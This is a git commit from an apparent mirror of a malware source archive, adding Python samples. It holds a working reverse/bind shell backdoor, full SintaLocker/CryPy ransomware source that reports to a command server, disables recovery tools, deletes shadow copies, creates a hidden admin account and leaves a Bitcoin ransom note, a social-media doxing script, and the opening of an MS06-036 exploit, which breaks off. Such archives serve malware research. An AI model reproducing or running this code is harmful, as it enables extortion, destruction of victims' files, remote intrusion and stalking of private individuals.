mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
Add files via upload
This commit is contained in:
parent
f5ec68af9b
commit
9cbdb38457
BIN
Python/AngstStealer.7z
Normal file
BIN
Python/AngstStealer.7z
Normal file
Binary file not shown.
BIN
Python/Aris.7z
Normal file
BIN
Python/Aris.7z
Normal file
Binary file not shown.
121
Python/Backdoor.Python.RShell
Normal file
121
Python/Backdoor.Python.RShell
Normal file
@ -0,0 +1,121 @@
|
||||
#!/usr/bin/env python
|
||||
|
||||
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
||||
# d00r.py 0.3a (reverse|bind)-shell in python by fQ #
|
||||
# #
|
||||
# alpha #
|
||||
# #
|
||||
# #
|
||||
# usage: #
|
||||
# % ./d00r -b password port #
|
||||
# % ./d00r -r password port host #
|
||||
# % nc host port #
|
||||
# % nc -l -p port (please use netcat) #
|
||||
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #
|
||||
|
||||
|
||||
import os, sys, socket, time
|
||||
|
||||
|
||||
# =================== var =======
|
||||
MAX_LEN=1024
|
||||
SHELL="/bin/zsh -c"
|
||||
TIME_OUT=300 #s
|
||||
PW=""
|
||||
PORT=""
|
||||
HOST=""
|
||||
|
||||
|
||||
# =================== funct =====
|
||||
# shell - exec command, return stdout, stderr; improvable
|
||||
def shell(cmd):
|
||||
sh_out=os.popen(SHELL+" "+cmd).readlines()
|
||||
nsh_out=""
|
||||
for i in range(len(sh_out)):
|
||||
nsh_out+=sh_out[i]
|
||||
return nsh_out
|
||||
|
||||
# action?
|
||||
def action(conn):
|
||||
conn.send("\nPass?\n")
|
||||
try: pw_in=conn.recv(len(PW))
|
||||
except: print "timeout"
|
||||
else:
|
||||
if pw_in == PW:
|
||||
conn.send("j00 are on air!\n")
|
||||
while True:
|
||||
conn.send(">>> ")
|
||||
try:
|
||||
pcmd=conn.recv(MAX_LEN)
|
||||
except:
|
||||
print "timeout"
|
||||
return True
|
||||
else:
|
||||
#print "pcmd:",pcmd
|
||||
cmd=""#pcmd
|
||||
for i in range(len(pcmd)-1):
|
||||
cmd+=pcmd[i]
|
||||
if cmd==":dc":
|
||||
return True
|
||||
elif cmd==":sd":
|
||||
return False
|
||||
else:
|
||||
if len(cmd)>0:
|
||||
out=shell(cmd)
|
||||
conn.send(out)
|
||||
|
||||
|
||||
# =================== main ======
|
||||
argv=sys.argv
|
||||
|
||||
if len(argv)<4:
|
||||
print "error; help: head -n 16 d00r.py"
|
||||
sys.exit(1)
|
||||
elif argv[1]=="-b":
|
||||
PW=argv[2]
|
||||
PORT=argv[3]
|
||||
elif argv[1]=="-r" and len(argv)>4:
|
||||
PW=argv[2]
|
||||
PORT=argv[3]
|
||||
HOST=argv[4]
|
||||
else: exit(1)
|
||||
|
||||
PORT=int(PORT)
|
||||
print "PW:",PW,"PORT:",PORT,"HOST:",HOST
|
||||
|
||||
#sys.argv[0]="d00r"
|
||||
|
||||
# exit father proc
|
||||
if os.fork()!=0:
|
||||
sys.exit(0)
|
||||
|
||||
# associate the socket
|
||||
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
sock.settimeout(TIME_OUT)
|
||||
|
||||
if argv[1]=="-b":
|
||||
sock.bind(('localhost', PORT))
|
||||
sock.listen(0)
|
||||
|
||||
run=True
|
||||
while run:
|
||||
|
||||
if argv[1]=="-r":
|
||||
try: sock.connect( (HOST, PORT) )
|
||||
except:
|
||||
print "host unreachable"
|
||||
time.sleep(5)
|
||||
else: run=action(sock)
|
||||
else:
|
||||
try: (conn,addr)=sock.accept()
|
||||
except:
|
||||
print "timeout"
|
||||
time.sleep(1)
|
||||
else: run=action(conn)
|
||||
|
||||
# shutdown the sokcet
|
||||
if argv[1]=="-b": conn.shutdown(2)
|
||||
else:
|
||||
try: sock.send("")
|
||||
except: time.sleep(1)
|
||||
else: sock.shutdown(2)
|
463
Python/CryPy_Source.py
Normal file
463
Python/CryPy_Source.py
Normal file
@ -0,0 +1,463 @@
|
||||
import os, fnmatch, struct, random, string, base64, platform, sys, time, socket, json, urllib, ctypes, urllib2
|
||||
import SintaRegistery
|
||||
import SintaChangeWallpaper
|
||||
from Crypto import Random
|
||||
from Crypto.Cipher import AES
|
||||
rmsbrand = 'SintaLocker'
|
||||
newextns = 'sinta'
|
||||
encfolder = '__SINTA I LOVE YOU__'
|
||||
email_con = 'sinpayy@yandex.com'
|
||||
btc_address = '1NEdFjQN74ZKszVebFum8KFJNd9oayHFT1'
|
||||
userhome = os.path.expanduser('~')
|
||||
my_server = 'http://www.dobrebaseny.pl/js/lib/srv/'
|
||||
wallpaper_link = 'http://wallpaperrs.com/uploads/girls/thumbs/mood-ravishing-hd-wallpaper-142943312215.jpg'
|
||||
victim_info = base64.b64encode(str(platform.uname()))
|
||||
configurl = my_server + 'api.php?info=' + victim_info + '&ip=' + base64.b64encode(socket.gethostbyname(socket.gethostname()))
|
||||
glob_config = None
|
||||
try:
|
||||
glob_config = json.loads(urllib.urlopen(configurl).read())
|
||||
if set(glob_config.keys()) != set(['MRU_ID', 'MRU_UDP', 'MRU_PDP']):
|
||||
raise Exception('0x00001')
|
||||
except IOError:
|
||||
time.sleep(1)
|
||||
|
||||
victim_id = glob_config[u'MRU_ID']
|
||||
victim_r = glob_config[u'MRU_UDP']
|
||||
victim_s = glob_config[u'MRU_PDP']
|
||||
try:
|
||||
os.system('bcdedit /set {default} recoveryenabled No')
|
||||
os.system('bcdedit /set {default} bootstatuspolicy ignoreallfailures')
|
||||
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableRegistryTools /d 1 /f')
|
||||
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableTaskMgr /d 1 /f')
|
||||
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /t REG_DWORD /v DisableCMD /d 1 /f')
|
||||
os.system('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /t REG_DWORD /v NoRun /d 1 /f')
|
||||
except WindowsError:
|
||||
pass
|
||||
|
||||
def setWallpaper(imageUrl):
|
||||
try:
|
||||
wallpaper = SintaChangeWallpaper.ChangeWallpaper()
|
||||
wallpaper.downloadWallpaper(imageUrl)
|
||||
except:
|
||||
pass
|
||||
|
||||
|
||||
def persistance():
|
||||
try:
|
||||
SintaRegistery.addRegistery(os.path.realpath(__file__))
|
||||
except:
|
||||
pass
|
||||
|
||||
|
||||
def destroy_shadow_copy():
|
||||
try:
|
||||
os.system('vssadmin Delete Shadows /All /Quiet')
|
||||
except:
|
||||
pass
|
||||
|
||||
|
||||
def create_remote_desktop():
|
||||
try:
|
||||
os.system('REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f')
|
||||
os.system('net user ' + victim_r + ' ' + victim_s + ' /add')
|
||||
os.system('net localgroup administrators ' + victim_r + ' /add')
|
||||
except:
|
||||
pass
|
||||
|
||||
|
||||
def write_instruction(dir, ext):
|
||||
try:
|
||||
files = open(dir + '\\README_FOR_DECRYPT.' + ext, 'w')
|
||||
files.write('! ! ! OWNED BY ' + rmsbrand + ' ! ! !\r\n\r\nAll your files are encrypted by ' + rmsbrand + ' with strong chiphers.\r\nDecrypting of your files is only possible with the decryption program, which is on our secret server.\r\nAll encrypted files are moved to ' + encfolder + ' directory and renamed to unique random name.\r\nTo receive your decryption program send $100 USD Bitcoin to address: ' + btc_address + '\r\nContact us after you send the money: ' + email_con + '\r\n\r\nJust inform your identification ID and we will give you next instruction.\r\nYour personal identification ID: ' + victim_id + '\r\n\r\nAs your partner,\r\n\r\n' + rmsbrand + '')
|
||||
except:
|
||||
pass
|
||||
|
||||
|
||||
def delete_file(filename):
|
||||
try:
|
||||
os.remove(filename)
|
||||
except:
|
||||
pass
|
||||
|
||||
|
||||
def find_files(root_dir):
|
||||
write_instruction(root_dir, 'md')
|
||||
extentions = ['*.txt',
|
||||
'*.exe',
|
||||
'*.php',
|
||||
'*.pl',
|
||||
'*.7z',
|
||||
'*.rar',
|
||||
'*.m4a',
|
||||
'*.wma',
|
||||
'*.avi',
|
||||
'*.wmv',
|
||||
'*.csv',
|
||||
'*.d3dbsp',
|
||||
'*.sc2save',
|
||||
'*.sie',
|
||||
'*.sum',
|
||||
'*.ibank',
|
||||
'*.t13',
|
||||
'*.t12',
|
||||
'*.qdf',
|
||||
'*.gdb',
|
||||
'*.tax',
|
||||
'*.pkpass',
|
||||
'*.bc6',
|
||||
'*.bc7',
|
||||
'*.bkp',
|
||||
'*.qic',
|
||||
'*.bkf',
|
||||
'*.sidn',
|
||||
'*.sidd',
|
||||
'*.mddata',
|
||||
'*.itl',
|
||||
'*.itdb',
|
||||
'*.icxs',
|
||||
'*.hvpl',
|
||||
'*.hplg',
|
||||
'*.hkdb',
|
||||
'*.mdbackup',
|
||||
'*.syncdb',
|
||||
'*.gho',
|
||||
'*.cas',
|
||||
'*.svg',
|
||||
'*.map',
|
||||
'*.wmo',
|
||||
'*.itm',
|
||||
'*.sb',
|
||||
'*.fos',
|
||||
'*.mcgame',
|
||||
'*.vdf',
|
||||
'*.ztmp',
|
||||
'*.sis',
|
||||
'*.sid',
|
||||
'*.ncf',
|
||||
'*.menu',
|
||||
'*.layout',
|
||||
'*.dmp',
|
||||
'*.blob',
|
||||
'*.esm',
|
||||
'*.001',
|
||||
'*.vtf',
|
||||
'*.dazip',
|
||||
'*.fpk',
|
||||
'*.mlx',
|
||||
'*.kf',
|
||||
'*.iwd',
|
||||
'*.vpk',
|
||||
'*.tor',
|
||||
'*.psk',
|
||||
'*.rim',
|
||||
'*.w3x',
|
||||
'*.fsh',
|
||||
'*.ntl',
|
||||
'*.arch00',
|
||||
'*.lvl',
|
||||
'*.snx',
|
||||
'*.cfr',
|
||||
'*.ff',
|
||||
'*.vpp_pc',
|
||||
'*.lrf',
|
||||
'*.m2',
|
||||
'*.mcmeta',
|
||||
'*.vfs0',
|
||||
'*.mpqge',
|
||||
'*.kdb',
|
||||
'*.db0',
|
||||
'*.mp3',
|
||||
'*.upx',
|
||||
'*.rofl',
|
||||
'*.hkx',
|
||||
'*.bar',
|
||||
'*.upk',
|
||||
'*.das',
|
||||
'*.iwi',
|
||||
'*.litemod',
|
||||
'*.asset',
|
||||
'*.forge',
|
||||
'*.ltx',
|
||||
'*.bsa',
|
||||
'*.apk',
|
||||
'*.re4',
|
||||
'*.sav',
|
||||
'*.lbf',
|
||||
'*.slm',
|
||||
'*.bik',
|
||||
'*.epk',
|
||||
'*.rgss3a',
|
||||
'*.pak',
|
||||
'*.big',
|
||||
'*.unity3d',
|
||||
'*.wotreplay',
|
||||
'*.xxx',
|
||||
'*.desc',
|
||||
'*.py',
|
||||
'*.m3u',
|
||||
'*.flv',
|
||||
'*.js',
|
||||
'*.css',
|
||||
'*.rb',
|
||||
'*.png',
|
||||
'*.jpeg',
|
||||
'*.p7c',
|
||||
'*.p7b',
|
||||
'*.p12',
|
||||
'*.pfx',
|
||||
'*.pem',
|
||||
'*.crt',
|
||||
'*.cer',
|
||||
'*.der',
|
||||
'*.x3f',
|
||||
'*.srw',
|
||||
'*.pef',
|
||||
'*.ptx',
|
||||
'*.r3d',
|
||||
'*.rw2',
|
||||
'*.rwl',
|
||||
'*.raw',
|
||||
'*.raf',
|
||||
'*.orf',
|
||||
'*.nrw',
|
||||
'*.mrwref',
|
||||
'*.mef',
|
||||
'*.erf',
|
||||
'*.kdc',
|
||||
'*.dcr',
|
||||
'*.cr2',
|
||||
'*.crw',
|
||||
'*.bay',
|
||||
'*.sr2',
|
||||
'*.srf',
|
||||
'*.arw',
|
||||
'*.3fr',
|
||||
'*.dng',
|
||||
'*.jpeg',
|
||||
'*.jpg',
|
||||
'*.cdr',
|
||||
'*.indd',
|
||||
'*.ai',
|
||||
'*.eps',
|
||||
'*.pdf',
|
||||
'*.pdd',
|
||||
'*.psd',
|
||||
'*.dbfv',
|
||||
'*.mdf',
|
||||
'*.wb2',
|
||||
'*.rtf',
|
||||
'*.wpd',
|
||||
'*.dxg',
|
||||
'*.xf',
|
||||
'*.dwg',
|
||||
'*.pst',
|
||||
'*.accdb',
|
||||
'*.mdb',
|
||||
'*.pptm',
|
||||
'*.pptx',
|
||||
'*.ppt',
|
||||
'*.xlk',
|
||||
'*.xlsb',
|
||||
'*.xlsm',
|
||||
'*.xlsx',
|
||||
'*.xls',
|
||||
'*.wps',
|
||||
'*.docm',
|
||||
'*.docx',
|
||||
'*.doc',
|
||||
'*.odb',
|
||||
'*.odc',
|
||||
'*.odm',
|
||||
'*.odp',
|
||||
'*.ods',
|
||||
'*.odt',
|
||||
'*.sql',
|
||||
'*.zip',
|
||||
'*.tar',
|
||||
'*.tar.gz',
|
||||
'*.tgz',
|
||||
'*.biz',
|
||||
'*.ocx',
|
||||
'*.html',
|
||||
'*.htm',
|
||||
'*.3gp',
|
||||
'*.srt',
|
||||
'*.cpp',
|
||||
'*.mid',
|
||||
'*.mkv',
|
||||
'*.mov',
|
||||
'*.asf',
|
||||
'*.mpeg',
|
||||
'*.vob',
|
||||
'*.mpg',
|
||||
'*.fla',
|
||||
'*.swf',
|
||||
'*.wav',
|
||||
'*.qcow2',
|
||||
'*.vdi',
|
||||
'*.vmdk',
|
||||
'*.vmx',
|
||||
'*.gpg',
|
||||
'*.aes',
|
||||
'*.ARC',
|
||||
'*.PAQ',
|
||||
'*.tar.bz2',
|
||||
'*.tbk',
|
||||
'*.bak',
|
||||
'*.djv',
|
||||
'*.djvu',
|
||||
'*.bmp',
|
||||
'*.cgm',
|
||||
'*.tif',
|
||||
'*.tiff',
|
||||
'*.NEF',
|
||||
'*.cmd',
|
||||
'*.class',
|
||||
'*.jar',
|
||||
'*.java',
|
||||
'*.asp',
|
||||
'*.brd',
|
||||
'*.sch',
|
||||
'*.dch',
|
||||
'*.dip',
|
||||
'*.vbs',
|
||||
'*.asm',
|
||||
'*.pas',
|
||||
'*.ldf',
|
||||
'*.ibd',
|
||||
'*.MYI',
|
||||
'*.MYD',
|
||||
'*.frm',
|
||||
'*.dbf',
|
||||
'*.SQLITEDB',
|
||||
'*.SQLITE3',
|
||||
'*.asc',
|
||||
'*.lay6',
|
||||
'*.lay',
|
||||
'*.ms11 (Security copy)',
|
||||
'*.sldm',
|
||||
'*.sldx',
|
||||
'*.ppsm',
|
||||
'*.ppsx',
|
||||
'*.ppam',
|
||||
'*.docb',
|
||||
'*.mml',
|
||||
'*.sxm',
|
||||
'*.otg',
|
||||
'*.slk',
|
||||
'*.xlw',
|
||||
'*.xlt',
|
||||
'*.xlm',
|
||||
'*.xlc',
|
||||
'*.dif',
|
||||
'*.stc',
|
||||
'*.sxc',
|
||||
'*.ots',
|
||||
'*.ods',
|
||||
'*.hwp',
|
||||
'*.dotm',
|
||||
'*.dotx',
|
||||
'*.docm',
|
||||
'*.DOT',
|
||||
'*.max',
|
||||
'*.xml',
|
||||
'*.uot',
|
||||
'*.stw',
|
||||
'*.sxw',
|
||||
'*.ott',
|
||||
'*.csr',
|
||||
'*.key',
|
||||
'wallet.dat']
|
||||
for dirpath, dirs, files in os.walk(root_dir):
|
||||
if 'Windows' not in dirpath:
|
||||
for basename in files:
|
||||
for ext in extentions:
|
||||
if fnmatch.fnmatch(basename, ext):
|
||||
filename = os.path.join(dirpath, basename)
|
||||
yield filename
|
||||
|
||||
|
||||
def make_directory(file_path):
|
||||
directory = file_path + '' + encfolder
|
||||
if not os.path.exists(directory):
|
||||
try:
|
||||
os.makedirs(directory)
|
||||
except:
|
||||
pass
|
||||
|
||||
|
||||
def text_generator(size = 6, chars = string.ascii_uppercase + string.digits):
|
||||
return ''.join((random.choice(chars) for _ in range(size))) + '.' + newextns
|
||||
|
||||
|
||||
def generate_file(file_path, filename):
|
||||
make_directory(file_path)
|
||||
key = ''.join([ random.choice(string.ascii_letters + string.digits) for n in xrange(32) ])
|
||||
newfilename = file_path + '\\' + encfolder + '\\' + text_generator(36, '1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm')
|
||||
try:
|
||||
encrypt_file(key, filename, newfilename)
|
||||
except:
|
||||
pass
|
||||
|
||||
|
||||
def encrypt_file(key, in_filename, newfilename, out_filename = None, chunksize = 65536, Block = 16):
|
||||
if not out_filename:
|
||||
out_filename = newfilename
|
||||
iv = ''.join((chr(random.randint(0, 255)) for i in range(16)))
|
||||
encryptor = AES.new(key, AES.MODE_CBC, iv)
|
||||
filesize = os.path.getsize(in_filename)
|
||||
with open(in_filename, 'rb') as infile:
|
||||
with open(out_filename, 'wb') as outfile:
|
||||
outfile.write(struct.pack('<Q', filesize))
|
||||
outfile.write(iv)
|
||||
while True:
|
||||
chunk = infile.read(chunksize)
|
||||
if len(chunk) == 0:
|
||||
break
|
||||
elif len(chunk) % 16 != 0:
|
||||
chunk += ' ' * (16 - len(chunk) % 16)
|
||||
outfile.write(encryptor.encrypt(chunk))
|
||||
|
||||
|
||||
listdir = (userhome + '\\Contacts\\',
|
||||
userhome + '\\Documents\\',
|
||||
userhome + '\\Downloads\\',
|
||||
userhome + '\\Favorites\\',
|
||||
userhome + '\\Links\\',
|
||||
userhome + '\\My Documents\\',
|
||||
userhome + '\\My Music\\',
|
||||
userhome + '\\My Pictures\\',
|
||||
userhome + '\\My Videos\\',
|
||||
'D:\\',
|
||||
'E:\\',
|
||||
'F:\\',
|
||||
'G:\\',
|
||||
'I:\\',
|
||||
'J:\\',
|
||||
'K:\\',
|
||||
'L:\\',
|
||||
'M:\\',
|
||||
'N:\\',
|
||||
'O:\\',
|
||||
'P:\\',
|
||||
'Q:\\',
|
||||
'R:\\',
|
||||
'S:\\',
|
||||
'T:\\',
|
||||
'U:\\',
|
||||
'V:\\',
|
||||
'W:\\',
|
||||
'X:\\',
|
||||
'Y:\\',
|
||||
'Z:\\')
|
||||
for dir_ in listdir:
|
||||
for filename in find_files(dir_):
|
||||
generate_file(dir_, filename)
|
||||
delete_file(filename)
|
||||
|
||||
persistance()
|
||||
destroy_shadow_copy()
|
||||
create_remote_desktop()
|
||||
write_instruction(userhome + '\\Desktop\\', 'txt')
|
||||
os.startfile(userhome + '\\Desktop\\README_FOR_DECRYPT.txt')
|
||||
setWallpaper(wallpaper_link)
|
336
Python/Doxing-Script-Py3.py
Normal file
336
Python/Doxing-Script-Py3.py
Normal file
@ -0,0 +1,336 @@
|
||||
import os
|
||||
import requests
|
||||
import sys
|
||||
import subprocess
|
||||
import re
|
||||
import face_recognition
|
||||
import json
|
||||
|
||||
done_checks = []
|
||||
social_media = []
|
||||
usernames = []
|
||||
emails = []
|
||||
twitter = []
|
||||
instagram = []
|
||||
steam = []
|
||||
urls = []
|
||||
urls_stalk = []
|
||||
urls_done = []
|
||||
name = ""
|
||||
adresse = ""
|
||||
compare = False
|
||||
first_dl = False
|
||||
|
||||
def stalk(user):
|
||||
if len(user) > 1:
|
||||
global urls_stalk
|
||||
pastebin_url = "https://pastebin.com/u/" + user
|
||||
pastebin_str = "s Pastebin - Pastebin.com"
|
||||
patreon_url = "https://www.patreon.com/" + user
|
||||
patreon_str = 'created_at'
|
||||
gutefrage_url = "https://www.gutefrage.net/nutzer/" + user
|
||||
gutefrage_str = '<meta name="title" content="Profil von'
|
||||
ebay_url = "https://www.ebay.de/usr/" + user
|
||||
ebay_str = '<span>Angemeldet seit: </span>'
|
||||
twitter_url = "https://twitter.com/" + user
|
||||
twitter_str = '<link rel="canonical" href="https://twitter.com/' + user + '">'
|
||||
facebook_url = 'https://facebook.com/' + user
|
||||
facebook_str = ' hreflang="sv" href="https://sv-se.facebook.com/' + user
|
||||
instagram_url = "https://www.instagram.com/" + user + "/"
|
||||
instagram_str = '<link rel="alternate" href="https://www.instagram.com/' + user + '/?hl=en" hreflang="en" />'
|
||||
steam_url = "https://steamcommunity.com/id/" + user
|
||||
steam_str = 'https://steamcommunity-a.akamaihd.net/public/images/skin_1/arrowDn9x5.gif'
|
||||
twitch_url = "https://www.twitch.tv/" + user
|
||||
twitch_str = "content='twitch://stream/" + user
|
||||
lachschon_url = "https://www.lachschon.de/community/user/" + user + "/"
|
||||
lachschon_str = '<label>Rang</label>'
|
||||
|
||||
URLS = [pastebin_url, patreon_url, gutefrage_url, ebay_url, facebook_url, twitter_url, instagram_url, steam_url, twitch_url, lachschon_url]
|
||||
STRS = [pastebin_str, patreon_str, gutefrage_str, ebay_str, facebook_str, twitter_str, instagram_str, steam_str, twitch_str, lachschon_str]
|
||||
|
||||
for i in range(0, len(URLS)):
|
||||
html = getResponse(URLS[i])
|
||||
if STRS[i].lower() in str(html).lower():
|
||||
print("\t> " + URLS[i])
|
||||
urls_stalk.append(URLS[i])
|
||||
|
||||
def get_twitter_img(user):
|
||||
url = "https://twitter.com/" + user
|
||||
html = subprocess.getoutput("phantomjs html.js " + url)
|
||||
image = find_between(html, '<img class="ProfileAvatar-image " src="', '" alt="')
|
||||
r = requests.get(image)
|
||||
with open('Twitter.jpg', 'wb') as f:
|
||||
f.write(r.content)
|
||||
|
||||
def get_instagram_img(user):
|
||||
data = {
|
||||
'username': user,
|
||||
'submit': 'View DP'
|
||||
}
|
||||
response = requests.post('https://fullinstadp.com/index.php', data=data)
|
||||
html = response.text
|
||||
f = open("Out.html", "w")
|
||||
f.write(html)
|
||||
f.close
|
||||
img_url = find_between(html, '<img class="loading img-rounded center-block img-responsive" src="', '" alt=""')
|
||||
r = requests.get(img_url)
|
||||
with open('Instagram.jpg', 'wb') as f:
|
||||
f.write(r.content)
|
||||
|
||||
def check_mail(string):
|
||||
EMAIL_REGEX = re.compile(r"[^@]+@[^@]+\.[^@]+")
|
||||
if EMAIL_REGEX.match(string):
|
||||
return True
|
||||
else:
|
||||
return False
|
||||
|
||||
def check_string_mail(string):
|
||||
global emails
|
||||
splitted = string.split(" ")
|
||||
for word in splitted:
|
||||
if check_mail(word):
|
||||
emails.append(word)
|
||||
|
||||
def check_string_url(string):
|
||||
global urls
|
||||
for word in string.split(" "):
|
||||
try:
|
||||
url = re.search("(?P<url>https?://[^\s]+)", word).group("url")
|
||||
if '//t.co/' in url:
|
||||
last = url[-1:]
|
||||
if last == ".":
|
||||
url = url.rstrip('.')
|
||||
r = requests.get(url)
|
||||
url = r.url
|
||||
urls.append(url)
|
||||
except:
|
||||
e = ""
|
||||
|
||||
def check_string_socialmedia(string):
|
||||
global social_media
|
||||
count = 0
|
||||
next = 0
|
||||
for word in string.split(" "):
|
||||
next = count + 2
|
||||
if 'facebook' in word.lower():
|
||||
print(string.split(" ")[next])
|
||||
count +=1
|
||||
|
||||
def youtube(url):
|
||||
url = url + "/about"
|
||||
html = subprocess.getoutput("phantomjs html.js " + url)
|
||||
tmp_str = html.split('"}},"urlEndpoint":')
|
||||
for url in tmp_str:
|
||||
#print(url)
|
||||
url = find_between(url, '{"url":"', '","target":')
|
||||
print(html)
|
||||
|
||||
def grab_instagram(profile):
|
||||
global done_checks
|
||||
global urls
|
||||
global instagram
|
||||
global usernames
|
||||
global compare
|
||||
if not "instagram: " + profile in done_checks:
|
||||
if not profile in usernames:
|
||||
usernames.append(profile)
|
||||
url = "https://www.instagram.com/" + profile + "/"
|
||||
html = subprocess.getoutput("phantomjs html.js " + url)
|
||||
if '"@type":"Person","name":"' in html:
|
||||
display_name = find_between(html, '"@type":"Person","name":"', '","alternateName":"')
|
||||
if not display_name in usernames:
|
||||
usernames.append(display_name)
|
||||
if not "instagram: " + display_name in done_checks:
|
||||
print(display_name)
|
||||
stalk(display_name)
|
||||
instagram.append("Display Name: " + display_name)
|
||||
description = find_between(html, '"user":{"biography":"', '","blocked_by_viewer')
|
||||
follower = find_between(html, 'edge_followed_by":{"count":', '},"followed_by_viewer')
|
||||
check_string_mail(description)
|
||||
check_string_url(description)
|
||||
instagram.append("Description: " + description)
|
||||
instagram.append("Follower: " + follower)
|
||||
#get_instagram_img(profile) // Buggy suche nach Alternative zu siehe Funktion
|
||||
compare = True
|
||||
if not "instagram: " + profile in done_checks:
|
||||
done_checks.append("instagram: " + profile)
|
||||
|
||||
def grab_steam(url):
|
||||
global done_checks
|
||||
global urls
|
||||
global usernames
|
||||
if not "steam: " + profile in done_checks:
|
||||
url = url + "/ajaxaliases/"
|
||||
response = requests.get(url)
|
||||
html = response.text
|
||||
for item in html.split("newname"):
|
||||
username = find_between(item, '":"', '","timechanged')
|
||||
if not username in usernames:
|
||||
usernames.append(username)
|
||||
|
||||
|
||||
|
||||
def grab_twitter(profile):
|
||||
global done_checks
|
||||
global urls
|
||||
global adresse
|
||||
global usernames
|
||||
global twitter
|
||||
global first_dl
|
||||
if not "twitter: " + profile in done_checks:
|
||||
url = "https://twitter.com/" + profile
|
||||
urls.append(url)
|
||||
html = subprocess.getoutput("phantomjs html.js " + url)
|
||||
#variables
|
||||
display_name = find_between(html, '<title>', ' (@')
|
||||
if not profile in usernames:
|
||||
usernames.append(profile)
|
||||
if not display_name in usernames:
|
||||
usernames.append(display_name)
|
||||
if not "twitter: " + display_name in done_checks:
|
||||
print(display_name)
|
||||
stalk(display_name)
|
||||
join_date = find_between(html, 'ProfileHeaderCard-joinDateText js-tooltip u-dir" dir="ltr" title="', '">Beigetreten')
|
||||
description = ""
|
||||
url = ""
|
||||
location = ""
|
||||
#if
|
||||
if '<meta name="description"' in html:
|
||||
description = find_between(html, '<meta name="description" content="', '">')
|
||||
description = description.replace(""", "")
|
||||
check_string_mail(description)
|
||||
check_string_url(description)
|
||||
if '<span class="ProfileHeaderCard-urlText u-dir"> <a class="u-textUserColor"' in html:
|
||||
tmp = find_between(html, '<span class="ProfileHeaderCard-urlText u-dir">', '</a>')
|
||||
url = find_between(tmp, '" title="', '">')
|
||||
urls.append(url)
|
||||
if 'location":"' in html:
|
||||
location = find_between(html, '"location":"', '","url')
|
||||
if len(location) > 0:
|
||||
adresse = location
|
||||
twitter.append("Display Name: " + display_name)
|
||||
twitter.append("Join Date: " + join_date)
|
||||
twitter.append("Description: " + description)
|
||||
twitter.append("URL: " + url)
|
||||
twitter.append("Location: " + location)
|
||||
twitter.append(" ")
|
||||
#if first_dl == False:
|
||||
#get_twitter_img(profile)
|
||||
#first_dl = True
|
||||
if not "twitter: " + profile in done_checks:
|
||||
done_checks.append("twitter: " + profile)
|
||||
|
||||
|
||||
|
||||
def handle():
|
||||
try:
|
||||
if sys.argv[1]:
|
||||
social_media = sys.argv[1].lower()
|
||||
if sys.argv[2]:
|
||||
info_type = sys.argv[2].lower()
|
||||
if sys.argv[3]:
|
||||
infos = sys.argv[3].lower()
|
||||
if info_type == "url":
|
||||
if social_media == "youtube":
|
||||
youtube(infos)
|
||||
elif info_type == "profile":
|
||||
if social_media == "twitter":
|
||||
grab_twitter(infos)
|
||||
elif info_type == "user":
|
||||
if social_media == "stalk":
|
||||
stalk(infos)
|
||||
except Exception as e:
|
||||
print(e)
|
||||
|
||||
def find_between( s, first, last ):
|
||||
try:
|
||||
start = s.index( first ) + len( first )
|
||||
end = s.index( last, start )
|
||||
return s[start:end]
|
||||
except ValueError:
|
||||
return ""
|
||||
|
||||
def getResponse(url):
|
||||
response = requests.get(url)
|
||||
#response.raise_for_status()
|
||||
data = response.content
|
||||
return data
|
||||
|
||||
|
||||
|
||||
handle()
|
||||
|
||||
for url in urls_stalk:
|
||||
#print(url)
|
||||
if 'twitter.com' in url:
|
||||
checked = False
|
||||
profile = url.split("/")[3]
|
||||
for check in done_checks:
|
||||
if check == "twitter: " + profile:
|
||||
checked = True
|
||||
if not checked:
|
||||
grab_twitter(profile)
|
||||
done_checks.append("twitter:" + profile)
|
||||
|
||||
if 'instagram.com' in url:
|
||||
checked = False
|
||||
profile = url.split("/")[3]
|
||||
for check in done_checks:
|
||||
if check == "instagram: " + profile:
|
||||
checked = True
|
||||
if not checked:
|
||||
grab_instagram(profile)
|
||||
#print("Download Profile Picture")
|
||||
done_checks.append("instagram: " + profile)
|
||||
#Steam Check direkt in der Stalk Funktion
|
||||
if 'steamcommunity.com' in url:
|
||||
checked = False
|
||||
profile = url.split("/")[4]
|
||||
for check in done_checks:
|
||||
if check == "steam: " + profile:
|
||||
checked = True
|
||||
if not checked:
|
||||
grab_steam(url)
|
||||
done_checks.append("steam: " + profile)
|
||||
|
||||
|
||||
print("------------------")
|
||||
print("Usernames:")
|
||||
print("------------------")
|
||||
for user in usernames:
|
||||
print(user)
|
||||
stalk(user)
|
||||
|
||||
if len(urls) > 0:
|
||||
print("------------------")
|
||||
print("URLs:")
|
||||
print("------------------")
|
||||
for url in urls:
|
||||
print(url)
|
||||
|
||||
if len(twitter) > 0:
|
||||
print("------------------")
|
||||
print("Twitter:")
|
||||
print("------------------")
|
||||
for item in twitter:
|
||||
print(item)
|
||||
|
||||
if len(instagram) > 0:
|
||||
print("------------------")
|
||||
print("Instagram:")
|
||||
print("------------------")
|
||||
for item in instagram:
|
||||
print(item)
|
||||
|
||||
if len(steam) > 0:
|
||||
print("------------------")
|
||||
print("Steam:")
|
||||
print("------------------")
|
||||
for item in steam:
|
||||
print(item)
|
||||
|
||||
print("------------------")
|
||||
print("Sites checked:")
|
||||
print("------------------")
|
||||
for check in done_checks:
|
||||
print(check)
|
237
Python/Exploit.Python.Ms06-036.a
Normal file
237
Python/Exploit.Python.Ms06-036.a
Normal file
@ -0,0 +1,237 @@
|
||||
#!/usr/bin/env python
|
||||
#
|
||||
#
|
||||
# by redsand@blacksecurity.org
|
||||
# this (like any thing) would not be possible w/out the bl4ck team.
|
||||
# thanks guys.
|
||||
#
|
||||
|
||||
